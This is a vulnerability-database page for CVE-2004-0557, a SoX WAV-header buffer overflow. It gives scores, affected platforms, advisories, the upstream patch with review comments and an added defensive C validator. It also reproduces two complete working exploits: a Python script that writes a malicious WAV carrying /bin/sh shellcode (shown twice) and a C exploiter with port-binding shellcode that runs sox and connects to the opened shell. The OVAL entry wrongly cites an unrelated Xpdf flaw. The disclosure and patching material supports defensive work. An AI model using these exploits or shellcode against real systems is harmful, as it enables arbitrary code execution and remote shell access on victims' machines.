CVE-2004-0557
CVSS 10.0
Published: 2004-08-06 00:00:00
Revised: 2010-08-21 00:20:46

[Original] Multiple buffer overflows in the st_wavstartread function in wav.c for Sound eXchange (SoX) 12.17.2 through 12.17.4 allow remote attackers to execute arbitrary code via certain WAV file header fields.


[CNNVD] SoX st_wavstartread() Remote Buffer Overflow Vulnerability (CNNVD-200408-106)

SoX is an open-source audio format conversion tool.
SoX has a buffer overflow when processing WAV files. A remote attacker can exploit it by building a malicious file and luring a user into processing it with SoX, which may execute arbitrary instructions on the system with the privileges of the process.
The problem lies in the st_wavstartread() function in 'wav.c': when the 'sox' and 'play' commands call this function, the user-supplied length variable is not checked correctly, so overlong data can corrupt a buffer and possibly lead to execution of arbitrary instructions. An attacker can exploit this by luring a user into processing a malicious file.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:sox:sox:12.17.2
cpe:/o:redhat:enterprise_linux_desktop:3.0 (Red Hat Desktop 3.0)
cpe:/o:redhat:enterprise_linux:3.0::workstation
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/a:sox:sox:12.17.3
cpe:/o:redhat:enterprise_linux:3.0::advanced_servers
cpe:/o:redhat:fedora_core:core_2.0
cpe:/o:redhat:fedora_core:core_1.0
cpe:/o:gentoo:linux:1.4 (Gentoo Linux 1.4)
cpe:/o:conectiva:linux:10.0 (Conectiva Linux 10.0)
cpe:/o:conectiva:linux:8.0 (Conectiva Linux 8.0)
cpe:/o:conectiva:linux:9.0 (Conectiva Linux 9.0)
cpe:/a:sox:sox:12.17.4

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9801 Buffer overflow in the JBIG2Bitmap::JBIG2Bitmap function in JBIG2Stream.cc in Xpdf, as used in products such as gpdf, kpdf, pdftohtml, poppl...
* OVAL describes in detail how to detect this vulnerability; see the related OVAL definition for more technical details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0557
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0557
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-106
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/10819
(VENDOR_ADVISORY)  BID  10819
http://www.redhat.com/support/errata/RHSA-2004-409.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:409
https://bugzilla.fedora.us/show_bug.cgi?id=1945
(UNKNOWN)  FEDORA  FLSA:1945
http://xforce.iss.net/xforce/xfdb/16827
(VENDOR_ADVISORY)  XF  sox-wav-bo(16827)
http://www.gentoo.org/security/en/glsa/glsa-200407-23.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200407-23
http://www.debian.org/security/2004/dsa-565
(UNKNOWN)  DEBIAN  DSA-565
http://secunia.com/advisories/12175
(UNKNOWN)  SECUNIA  12175
http://lwn.net/Articles/95530/
(UNKNOWN)  FEDORA  FEDORA-2004-244
http://lwn.net/Articles/95529/
(UNKNOWN)  FEDORA  FEDORA-2004-235
http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0014.html
(UNKNOWN)  VULNWATCH  20040728 SoX buffer overflows when handling .WAV files
http://www.mandriva.com/security/advisories?name=MDKSA-2004:076
(UNKNOWN)  MANDRAKE  MDKSA-2004:076
http://seclists.org/fulldisclosure/2004/Jul/1227.html
(UNKNOWN)  FULLDISC  20040728 SoX buffer overflows when handling .WAV files
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000855
(UNKNOWN)  CONECTIVA  CLA-2004:855

- Vulnerability information

SoX st_wavstartread() Remote Buffer Overflow Vulnerability
Critical  Boundary condition error
2004-08-06 00:00:00  2005-10-20 00:00:00
Local

SoX is an open-source audio format conversion tool.
SoX has a buffer overflow when processing WAV files. A remote attacker can exploit it by building a malicious file and luring a user into processing it with SoX, which may execute arbitrary instructions on the system with the privileges of the process.
The problem lies in the st_wavstartread() function in 'wav.c': when the 'sox' and 'play' commands call this function, the user-supplied length variable is not checked correctly, so overlong data can corrupt a buffer and possibly lead to execution of arbitrary instructions. An attacker can exploit this by luring a user into processing a malicious file.

- Bulletins and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Ulf Harnhammar provides the following patch:
        --- wav.c.old 2002-12-31 04:19:22.000000000 +0100
        +++ wav.c 2004-07-18 19:25:46.000000000 +0200
        @@ -917,6 +917,10 @@
        } else if(strncmp(magic,"ICRD",4) == 0){
        st_readdw(ft,&len);
        len = (len + 1) & ~1;
        + if (len > 254) {
        + fprintf(stderr, "Possible buffer overflow hack attack (ICRD)!\n");
        + exit(109);
        + }
        st_reads(ft,text,len);
        if (strlen(ft->comment) + strlen(text) < 254)
        {
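Review bot: the new `if (len > 254)` guard hard-codes the buffer limit rather than deriving it from the declaration of `text`, and the same literal 254 already appears in the `strlen(ft->comment) + strlen(text) < 254` comparison two lines below; a single named constant (or an expression on `sizeof(text)`) would keep the guard and the concatenation check in step if the buffer is ever resized. Also, `exit(109)` terminates the whole process from inside the format reader; reporting the failure through the reader's normal error path would let `sox` and `play` reject the file cleanly and would not kill any other program linked against the library.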
        @@ -926,6 +930,10 @@
        } else if(strncmp(magic,"ISFT",4) == 0){
        st_readdw(ft,&len);
        len = (len + 1) & ~1;
        + if (len > 254) {
        + fprintf(stderr, "Possible buffer overflow hack attack (ISFT)!\n");
        + exit(110);
        + }
        st_reads(ft,text,len);
        if (strlen(ft->comment) + strlen(text) < 254)
        {
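Review bot: this hunk repeats the ICRD guard verbatim for ISFT, with only the message and exit code differing; factoring the check into one helper (or one macro) avoids the two copies drifting apart. Since the guard is inserted per sub-chunk, the rest of the LIST/INFO loop should be checked for any other field that is read with `st_reads` into the same fixed-size `text` buffer, because any such field needs the identical bound.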
Vendor patch:
SoX
---
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://sox.sourceforge.net/
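As an added example (not code from SoX, from the patch author, or from this page), the following C program walks the LIST/INFO section of a WAV image held in memory and applies the same rule the patch above introduces: a sub-chunk's declared length is compared against the 254-byte bound before any of its data is read, and a chunk that claims more bytes than the image holds is rejected as truncated. The function and macro names, the enum values and the three sample images are all this example's own; the samples are constructed for the demonstration and are not real files.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bound the patch enforces before wav.c reads a sub-chunk into its text buffer. */
#define INFO_TEXT_MAX 254u

enum wav_check {
    WAV_OK = 0,
    WAV_NOT_RIFF_WAVE,  /* no "RIFF....WAVE" prefix */
    WAV_TRUNCATED,      /* a chunk claims more bytes than the image holds */
    WAV_OVERSIZED_INFO  /* a LIST/INFO sub-chunk length exceeds INFO_TEXT_MAX */
};

static uint32_t rd_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Walk the sub-chunks of one LIST/INFO body occupying buf[0..len). */
static enum wav_check check_info_list(const unsigned char *buf, size_t len, char *text, size_t text_cap)
{
    size_t pos = 0;
    while (pos + 8 <= len) {
        const unsigned char *id = buf + pos;
        uint32_t sub_len = rd_le32(buf + pos + 4);
        pos += 8;
        /* The patch's guard: decided from the length field alone, before any chunk data is read. */
        if (sub_len > INFO_TEXT_MAX) return WAV_OVERSIZED_INFO;
        if (sub_len > len - pos) return WAV_TRUNCATED;
        if (text_cap > 0 && (memcmp(id, "ICRD", 4) == 0 || memcmp(id, "ISFT", 4) == 0)) {
            size_t ncopy = sub_len < text_cap - 1 ? sub_len : text_cap - 1;  /* bounded copy */
            memcpy(text, buf + pos, ncopy);
            text[ncopy] = '\0';
        }
        pos += ((size_t)sub_len + 1) & ~(size_t)1;  /* odd lengths are padded to even, as in wav.c */
    }
    return WAV_OK;
}

/* Validate a whole WAV image in memory; returns WAV_OK or the first problem found.
 * With text_cap > 0, text receives the last ICRD/ISFT string of a valid image. */
enum wav_check wav_info_check(const unsigned char *buf, size_t n, char *text, size_t text_cap)
{
    if (text_cap > 0) text[0] = '\0';
    if (n < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "WAVE", 4) != 0)
        return WAV_NOT_RIFF_WAVE;
    size_t pos = 12;
    while (pos + 8 <= n) {
        const unsigned char *id = buf + pos;
        uint32_t size = rd_le32(buf + pos + 4);
        pos += 8;
        if (size > n - pos) return WAV_TRUNCATED;
        if (memcmp(id, "LIST", 4) == 0 && size >= 4 && memcmp(buf + pos, "INFO", 4) == 0) {
            enum wav_check rc = check_info_list(buf + pos + 4, size - 4, text, text_cap);
            if (rc != WAV_OK) return rc;
        }
        pos += ((size_t)size + 1) & ~(size_t)1;
    }
    return WAV_OK;
}

/* Convenience wrapper: the ICRD/ISFT text of a valid image, or NULL if the image is rejected. */
const char *wav_last_info_text(const unsigned char *buf, size_t n)
{
    static char text[INFO_TEXT_MAX + 2];
    return wav_info_check(buf, n, text, sizeof text) == WAV_OK ? text : NULL;
}

/* Constructed sample images (not real files): 8-bit mono PCM header, empty data chunk, LIST/INFO. */
#define LE16(v) (unsigned char)((v) & 0xff), (unsigned char)(((v) >> 8) & 0xff)
#define LE32(v) LE16((v) & 0xffff), LE16(((v) >> 16) & 0xffff)
#define PCM8_MONO 'f','m','t',' ', LE32(16), LE16(1), LE16(1), LE32(8000), LE32(8000), LE16(1), LE16(8), \
                  'd','a','t','a', LE32(0)
/* ICRD "2004-07-18": well-formed. */
static const unsigned char benign_wav[] = {
    'R','I','F','F', LE32(66), 'W','A','V','E', PCM8_MONO,
    'L','I','S','T', LE32(22), 'I','N','F','O', 'I','C','R','D', LE32(10), '2','0','0','4','-','0','7','-','1','8' };
/* ICRD declares 0x17e bytes, far beyond the 254-byte bound: rejected before any data is read. */
static const unsigned char oversized_icrd_wav[] = {
    'R','I','F','F', LE32(60), 'W','A','V','E', PCM8_MONO,
    'L','I','S','T', LE32(16), 'I','N','F','O', 'I','C','R','D', LE32(0x17e), '.','.','.','.' };
/* ICRD declares 10 bytes but only 4 follow: a truncated file. */
static const unsigned char truncated_wav[] = {
    'R','I','F','F', LE32(60), 'W','A','V','E', PCM8_MONO,
    'L','I','S','T', LE32(16), 'I','N','F','O', 'I','C','R','D', LE32(10), '2','0','0','4' };

int main(void)
{
    const char *t = wav_last_info_text(benign_wav, sizeof benign_wav);
    printf("benign: %s\n", t ? t : "(rejected)");
    printf("oversized ICRD: rc=%d\n", wav_info_check(oversized_icrd_wav, sizeof oversized_icrd_wav, NULL, 0));
    printf("truncated: rc=%d\n", wav_info_check(truncated_wav, sizeof truncated_wav, NULL, 0));
    return 0;
}
```

The order of the two checks in check_info_list is the point: the length limit is applied to the declared size before the walker looks at a single byte of sub-chunk data, which is exactly where the unpatched st_wavstartread() went wrong by trusting that size for the read. The separate truncation check is what a file-validation tool needs on top of the patch, since a short or malformed file is a far more common cause of bad lengths than an attack.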

- Vulnerability information (369)

SoX Local Buffer Overflow Exploit (EDBID:369)
linux local
2004-08-01 Verified
0 Serkan Akpolat
N/A
# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
# Tested Under Slackware 9.1
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
# Homepage: http://deicide.siyahsapka.org
# Greets to: Virulent
# deicide@gate:~$ play britney.wav
# sh-2.05b$

# "jmp %esp" from libc.so , change this if needed..
retJmpEsp=0x4029824B

# intel_order() from MOSDEF
def intel_order(myint):
    str=""
    a=chr(myint % 256)
    myint=myint >> 8
    b=chr(myint % 256)
    myint=myint >> 8
    c=chr(myint % 256)
    myint=myint >> 8
    d=chr(myint % 256)
    str+="%c%c%c%c" % (a,b,c,d)
    return str

# Wave Header
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\
"\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\
"\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\
"\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\
"\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\
"\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\
"\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\
"\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode
wavFile = open("britney.wav", "wb")
wavFile.write(evilBuf)
wavFile.close()
print "Evil Song has been created :Pp"

# milw0rm.com [2004-08-01]
		

- Vulnerability information (374)

SoX Local Buffer Overflow Exploiter (Via Crafted WAV File) (EDBID:374)
linux local
2004-08-04 Verified
0 Rave
N/A
--------------------------------- Begin Code: sox-exploiter.c ---------------------------------
/*


  Copyright Rosiello Security 2004
               http://www.rosiello.org


CVE Reference: CAN-2004-0557
Bug Type: Stack Overflow
Date: 01/08/2004


Ulf Harnhammar reported that there are two buffer overflows in the 'sox' and 'play' commands.
The flaws reside in the st_wavstartread() function in 'wav.c', where the function reads data
based on a user-supplied size variable into a buffer without checking to see if the specified
amount of data will fit into the buffer.

The report indicates that older versions, including 12.17.1, 12.17 and 12.16, are not affected.

Vendors were reportedly notified on July 18, 2004.
Impact: A remote user can create a WAV file that, when processed by the target user, will execute
arbitrary code on the target system with the privileges of the SoX process.
Solution: No vendor solution was available at the time of this entry.

**************************************************************************************************
!!! DO NOT USE THIS SOFTWARE TO BREAK THE LAW !!!

This exploit will create a malevolent .wav file that will execute the shellcode (it's a
port_bind() opening the port 5074)
Example:
$./sox-exploiter laser.wav malevolent.wav 0
When you play the file malevolent.wav the shellcode is executed.

AUTHOR: rave --> rave@rosiello.org
AUTHOR: Angelo Rosiello --> angelo@rosiello.org
WEB : http://www.rosiello.org
*/


#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>

 /* used for stating */
#include <sys/types.h>
#include <sys/stat.h>

/* used for mmap */
#include <sys/mman.h>

/* perror() */
#include <errno.h>

/* strstr */
#include <string.h>


enum { suse, redhat, slackware };


struct tr
{
  char *OS;
  unsigned long ret;
  } target [] = {

     "SuSe 9.1 Pro",
     0xbfffe9f0,


     "Redhat 9.1",
     0x41414141
   };

signed char
shellcode[]=
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

/*
 * s0t4ipv6@Shellcode.com.ar
 * x86 portbind a shell in port 5074
 * 92 bytes.
 */

"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x40" // incl %eax
"\x89\xc3" // movl %eax,%ebx
"\x50" // pushl %eax
"\x40" // incl %eax
"\x50" // pushl %eax
"\x89\xe1" // movl %esp,%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x31\xd2" // xorl %edx,%edx
"\x52" // pushl %edx
"\x66\x68\x13\xd2" // pushw $0xd213
"\x43" // incl %ebx
"\x66\x53" // pushw %bx
"\x89\xe1" // movl %esp,%ecx
"\x6a\x10" // pushl $0x10
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x89\xe1" // movl %esp,%ecx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x40" // incl %eax
"\x89\x44\x24\x04" // movl %eax,0x4(%esp,1)
"\x43" // incl %ebx
"\x43" // incl %ebx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x83\xc4\x0c" // addl $0xc,%esp
"\x52" // pushl %edx
"\x52" // pushl %edx
"\x43" // incl %ebx
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchgl %eax,%ebx
"\x89\xd1" // movl %edx,%ecx
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80
"\x41" // incl %ecx
"\x80\xf9\x03" // cmpb $0x3,%cl
"\x75\xf6" // jnz <shellcode+0x40>
"\x52" // pushl %edx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x52" // pushl %edx
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80
;

signed long shelladdr =0xbfffe9f0;//0xbfffe9d8;//0xbffff3ea;

char *memap;
char *fs_io(char *filename, char *data, mode_t flags, long *size)
{
struct stat status;
int fd;

if ( data == NULL) {

if ( lstat (filename,&status) < 0)
{
 printf("Input File not found\n");
 exit(-1);
}

if ((fd=open ( filename , flags,0666)) == -1) {
  perror("open");
  exit (-1);
  }

   memap=mmap(0,status.st_size,PROT_READ|PROT_WRITE,MAP_PRIVATE,fd,0);

  if ( memap == NULL)
   {printf("allocation problem\n"); exit (-1);}

   (*(long *)size) = status.st_size;
   return (char *)memap;
  }


}


int connect_to( char *addr)
{
struct sockaddr_in sin4;
int sock;
char in [512];
char out [512];
char banner[512];
size_t size;

   sin4.sin_family = AF_INET;
   sin4.sin_addr.s_addr = inet_addr(addr);
   sin4.sin_port = htons(5074);

   sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   if (!sock)
   {
     return -1;
   }

  if (connect (sock,(struct sockaddr *)&sin4,sizeof(struct sockaddr_in)) ==-1)
  {

    return -1;
    }

    printf("[+] Exploit success\n");
    size=sprintf(banner,"%s","uname -a;\n");
    write ( sock, banner, size );

    while ( 1 )
    {
    size=read (sock,in,sizeof(in));
    in[size] = '\0';
    printf("%s\n",in);


    scanf("%s",&out);
    strcat(out,"\n");

    write (sock, out,strlen(out));
    memset(in,'\0',sizeof(in));
    memset(out,'\0',sizeof(out));
    }


}

void usage(char *file)
{
int i;
printf("USAGE:\n");
printf("SoX Exploiter by Rosiello Security\n");
printf("%s source.wav vulnerable.wav target\n", file);
for (i=0;i < 2;i++)
printf("TARGET: %d %s %x\n",i,target[i].OS,target[i].ret);
exit(0);
}


int main(int argc, char **argv)
{

  char *ptr,*tmp;
  int fd,count;
  long sizefield,sizeloc;
  int size;
  char payload[500];
  pid_t pid;
  int opt;
  if ((argc) != 4)
    usage(argv[0]);
  opt=atoi(argv[3]);

  memap = fs_io(argv[1],NULL,O_RDWR,&size);

  printf("[+] Sox Exploiter by Rosiello Security\n");
  printf("[+] Opened %s size : %d\n",argv[1],size);


  ptr = memap;
  count =0;
  do
  {
   ptr++;
   if ((strncmp("INFOICRD",ptr,8)==0)) break;

  } while ( (count ++ !=size) );

  tmp = (char *)malloc ( size + 512);
  tmp = memap;

  ptr +=8;
  sizefield = (long) ptr[0];
  sizeloc = (long) (count + 8)+1;

  tmp[sizeloc]=01;
  tmp[sizeloc+1]=02;

  if ((fd=open ( argv[2] , O_WRONLY | O_CREAT | O_TRUNC,0666)) == -1) {
   perror("open");
   return -1;
  }

  sizeloc +=2;
  write(fd,tmp,sizeloc);

  memset(payload,0x2e,318);

  size=sprintf(payload+318,"%s%s",((char *)&target[opt].ret),shellcode);


  write (fd,payload,sizeof(payload));
  close(fd);

  size = 0x0102 - size;

  printf("[+] Coded by rave & Angelo Rosiello\n");
  printf("[+] Writing evil code into %s\n", argv[2]);
  printf("[+] Org sizefield = %d new sizefield = %d\n",sizefield,0x0102);
  printf("[+] Overflowing the buffer with %d Bytes\n",size);
  printf("[+] Executing /usr/bin/sox\n");
  printf("[+] Connecting to localhost\n");

  pid = fork();
  if (pid ==0) {
    execl("/usr/bin/sox","sox",argv[2],"-t","ossdsp","/dev/dsp" ,NULL);

   };

  sleep(1);
  if ((connect_to("127.0.0.1")) <0)
    printf("[-] Exploit failed\n");

  return EXIT_SUCCESS;
}
---------------------------------- End Code: sox-exploiter.c ----------------------------------

// milw0rm.com [2004-08-04]
		

- Vulnerability information (F33934)

evil_song.py (PacketStormID:F33934)
2004-08-05 00:00:00
Serkan Akpolat  deicide.siyahsapka.org
exploit,local
linux,slackware
CVE-2004-0557

Local exploit that makes use of the WAV header handling vulnerability in SoX versions 12.17.4-r1 and below. Tested under Slackware 9.1.

# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
# Tested Under Slackware 9.1
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
# Homepage: http://deicide.siyahsapka.org
# Greets to: Virulent 
# deicide@gate:~$ play britney.wav 
# sh-2.05b$ 

# "jmp %esp" from libc.so , change this if needed..
retJmpEsp=0x4029824B

# intel_order() from MOSDEF
def intel_order(myint):
	str=""
	a=chr(myint % 256)
	myint=myint >> 8
	b=chr(myint % 256)
	myint=myint >> 8
	c=chr(myint % 256)
	myint=myint >> 8
	d=chr(myint % 256)
	str+="%c%c%c%c" % (a,b,c,d)
	return str

# Wave Header
begin = "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20" +\
        "\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00" +\
        "\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02" +\
        "\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01" +\
        "\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00" +\
        "\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01" +\
        "\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65" +\
        "\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

evilBuf = begin+"boom"*75+intel_order(retJmpEsp)+shellcode
wavFile = open("britney.wav", "wb")
wavFile.write(evilBuf)
wavFile.close()
print "Evil Song has been created :Pp"

    

- Vulnerability information (F33905)

soxWAVFileBufferOverflowExploit.c (PacketStormID:F33905)
2004-08-04 00:00:00
Angelo Rosiello,rosiello,Johnny Mast  rosiello.org
exploit,local
CVE-2004-0557

Local exploit that makes use of the WAV header handling vulnerability in SoX versions 12.17.4-r1 and below.

- Vulnerability information

8267
SoX .WAV File Processing Multiple Field Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Description

SoX contains a flaw that may allow a malicious user to execute arbitrary code on a remote system. The issue is triggered when a user executes a specially crafted .wav file created by a malicious user which will overflow a buffer in the st_wavstartread() function of wav.c. It is possible that the flaw may allow remote code execution on the local system resulting in a loss of confidentiality and integrity.

- Timeline

2004-07-29 Unknown
2004-08-02 Unknown

- Solution

Upgrade to version 12.17.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Author

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's related websites